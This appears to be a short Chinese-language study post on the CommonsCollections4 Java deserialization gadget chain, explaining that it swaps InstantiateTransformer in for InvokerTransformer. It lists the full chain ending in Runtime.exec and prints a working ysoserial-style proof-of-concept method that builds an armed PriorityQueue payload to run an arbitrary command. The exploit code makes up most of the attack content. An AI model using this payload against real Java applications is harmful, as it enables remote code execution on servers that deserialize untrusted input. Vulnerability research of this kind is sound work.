CC4使用

与CC2相比,使用了InstantiateTransformer来取代InvokerTransformer

利用链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Gadget chain:
        ObjectInputStream.readObject()
            PriorityQueue.readObject()
                PriorityQueue.heapify()
                    PriorityQueue. siftDown()
                        PriorityQueue.siftDownUsingComparator()
                            TransformingComparator.compare()
                                ChainedTransformer.transform()
                                    ConstantTransformer.transform()
                                    InstantiateTransformer.transform()
                                        TrAXFilter.newInstence()
                                            TrAXFilter.TrAXFilter(Templates templates)
                                                TemplatesImpl.newTransformer()
                                                ......
                                                    Runtime.exec()

前半部分和后半部分前面的几条链子也都分析过了,所以也不用 再说了。

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
public Queue<Object> getObject(final String command) throws Exception {
        Object templates = Gadgets.createTemplatesImpl(command);

        ConstantTransformer constant = new ConstantTransformer(String.class);

        // mock method name until armed
        Class[] paramTypes = new Class[] { String.class };
        Object[] args = new Object[] { "foo" };
        InstantiateTransformer instantiate = new InstantiateTransformer(
                paramTypes, args);

        // grab defensively copied arrays
        paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
        args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

        ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

        // create queue with numbers
        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
        queue.add(1);
        queue.add(1);

        // swap in values to arm
        Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
        paramTypes[0] = Templates.class;
        args[0] = templates;

        return queue;
    }